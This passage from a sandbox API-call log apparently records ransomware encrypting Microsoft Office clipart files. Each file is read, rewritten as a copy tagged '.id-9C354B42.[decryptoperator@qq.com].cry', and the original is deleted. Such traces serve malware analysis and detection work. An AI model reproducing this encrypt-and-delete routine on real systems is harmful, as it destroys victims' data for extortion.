returned -1 [0052.616] lstrlenW (lpString=".xls") returned 4 [0052.616] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.616] lstrlenW (lpString=".xlsx") returned 5 [0052.616] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.616] lstrlenW (lpString=".ppt") returned 4 [0052.616] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0052.616] lstrlenW (lpString=".zip") returned 4 [0052.616] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.616] lstrlenW (lpString=".rar") returned 4 [0052.616] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.616] lstrlenW (lpString=".bz2") returned 4 [0052.616] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.616] lstrlenW (lpString=".7z") returned 3 [0052.616] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0052.616] lstrlenW (lpString=".dbf") returned 4 [0052.616] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0052.616] lstrlenW (lpString=".1cd") returned 4 [0052.616] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0052.616] lstrlenW (lpString=".jpg") returned 4 [0052.616] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.616] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5836) returned 1 [0052.616] CloseHandle (hObject=0x204) returned 1 [0052.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 0x20 [0052.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.617] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.617] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.617] GetLastError () returned 0x0 [0052.617] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x16cc, lpOverlapped=0x0) returned 1 [0052.651] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x16d0, lpOverlapped=0x0) returned 1 [0052.652] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.652] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.652] SetEndOfFile (hFile=0x1bc) returned 1 [0052.652] CloseHandle (hObject=0x1bc) returned 1 [0052.652] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.652] SetEndOfFile (hFile=0x204) returned 1 [0052.653] CloseHandle (hObject=0x204) returned 1 [0052.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.653] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0052.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0052.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0052.654] lstrlenW (lpString=".doc") returned 4 [0052.654] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.654] lstrlenW (lpString=".docx") returned 5 [0052.654] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.654] lstrlenW (lpString=".pdf") returned 4 [0052.654] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.654] lstrlenW (lpString=".xls") returned 4 [0052.654] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.654] lstrlenW (lpString=".xlsx") returned 5 [0052.654] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.654] lstrlenW (lpString=".ppt") returned 4 [0052.654] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0052.654] lstrlenW (lpString=".zip") returned 4 [0052.654] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.654] lstrlenW (lpString=".rar") returned 4 [0052.654] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.654] lstrlenW (lpString=".bz2") returned 4 [0052.654] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.654] lstrlenW (lpString=".7z") returned 3 [0052.654] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0052.654] lstrlenW (lpString=".dbf") returned 4 [0052.654] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0052.655] lstrlenW (lpString=".1cd") returned 4 [0052.655] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0052.655] lstrlenW (lpString=".jpg") returned 4 [0052.655] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.655] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2756) returned 1 [0052.655] CloseHandle (hObject=0x204) returned 1 [0052.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 0x20 [0052.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.655] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.655] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.656] GetLastError () returned 0x0 [0052.656] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xac4, lpOverlapped=0x0) returned 1 [0052.661] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xad0, lpOverlapped=0x0) returned 1 [0052.662] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.662] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.662] SetEndOfFile (hFile=0x1bc) returned 1 [0052.662] CloseHandle (hObject=0x1bc) returned 1 [0052.662] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.662] SetEndOfFile (hFile=0x204) returned 1 [0052.663] CloseHandle (hObject=0x204) returned 1 [0052.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.663] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0052.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0052.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0052.663] lstrlenW (lpString=".doc") returned 4 [0052.663] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.663] lstrlenW (lpString=".docx") returned 5 [0052.663] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.663] lstrlenW (lpString=".pdf") returned 4 [0052.663] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.663] lstrlenW (lpString=".xls") returned 4 [0052.663] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.663] lstrlenW (lpString=".xlsx") returned 5 [0052.663] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.663] lstrlenW (lpString=".ppt") returned 4 [0052.663] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0052.664] lstrlenW (lpString=".zip") returned 4 [0052.664] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.664] lstrlenW (lpString=".rar") returned 4 [0052.664] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.664] lstrlenW (lpString=".bz2") returned 4 [0052.664] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.664] lstrlenW (lpString=".7z") returned 3 [0052.664] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0052.664] lstrlenW (lpString=".dbf") returned 4 [0052.664] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0052.664] lstrlenW (lpString=".1cd") returned 4 [0052.664] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0052.664] lstrlenW (lpString=".jpg") returned 4 [0052.664] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.664] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=7372) returned 1 [0052.665] CloseHandle (hObject=0x204) returned 1 [0052.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 0x20 [0052.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.665] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.665] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.665] GetLastError () returned 0x0 [0052.665] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x1ccc, lpOverlapped=0x0) returned 1 [0052.667] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1cd0, lpOverlapped=0x0) returned 1 [0052.668] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.668] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.668] SetEndOfFile (hFile=0x1bc) returned 1 [0052.668] CloseHandle (hObject=0x1bc) returned 1 [0052.669] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.669] SetEndOfFile (hFile=0x204) returned 1 [0052.669] CloseHandle (hObject=0x204) returned 1 [0052.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.670] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0052.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0052.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0052.670] lstrlenW (lpString=".doc") returned 4 [0052.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.670] lstrlenW (lpString=".docx") returned 5 [0052.670] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.670] lstrlenW (lpString=".pdf") returned 4 [0052.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.670] lstrlenW (lpString=".xls") returned 4 [0052.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.670] lstrlenW (lpString=".xlsx") returned 5 [0052.670] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.670] lstrlenW (lpString=".ppt") returned 4 [0052.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0052.670] lstrlenW (lpString=".zip") returned 4 [0052.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.670] lstrlenW (lpString=".rar") returned 4 [0052.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.670] lstrlenW (lpString=".bz2") returned 4 [0052.670] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.670] lstrlenW (lpString=".7z") returned 3 [0052.670] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0052.671] lstrlenW (lpString=".dbf") returned 4 [0052.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0052.671] lstrlenW (lpString=".1cd") returned 4 [0052.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0052.671] lstrlenW (lpString=".jpg") returned 4 [0052.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.672] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=7540) returned 1 [0052.672] CloseHandle (hObject=0x204) returned 1 [0052.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 0x20 [0052.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.672] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.672] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.672] GetLastError () returned 0x0 [0052.672] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x1d74, lpOverlapped=0x0) returned 1 [0052.690] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1d80, lpOverlapped=0x0) returned 1 [0052.691] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.691] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.691] SetEndOfFile (hFile=0x1bc) returned 1 [0052.691] CloseHandle (hObject=0x1bc) returned 1 [0052.691] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.691] SetEndOfFile (hFile=0x204) returned 1 [0052.692] CloseHandle (hObject=0x204) returned 1 [0052.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.692] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0052.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.692] lstrlenW (lpString=".doc") returned 4 [0052.692] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.692] lstrlenW (lpString=".docx") returned 5 [0052.692] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.693] lstrlenW (lpString=".pdf") returned 4 [0052.693] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.693] lstrlenW (lpString=".xls") returned 4 [0052.693] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.693] lstrlenW (lpString=".xlsx") returned 5 [0052.693] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.693] lstrlenW (lpString=".ppt") returned 4 [0052.693] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.693] lstrlenW (lpString=".zip") returned 4 [0052.693] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.693] lstrlenW (lpString=".rar") returned 4 [0052.693] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.693] lstrlenW (lpString=".bz2") returned 4 [0052.693] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.693] lstrlenW (lpString=".7z") returned 3 [0052.693] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.693] lstrlenW (lpString=".dbf") returned 4 [0052.693] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.693] lstrlenW (lpString=".1cd") returned 4 [0052.693] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.693] lstrlenW (lpString=".jpg") returned 4 [0052.693] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.693] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=6632) returned 1 [0052.693] CloseHandle (hObject=0x204) returned 1 [0052.693] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 0x20 [0052.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.694] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.694] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: 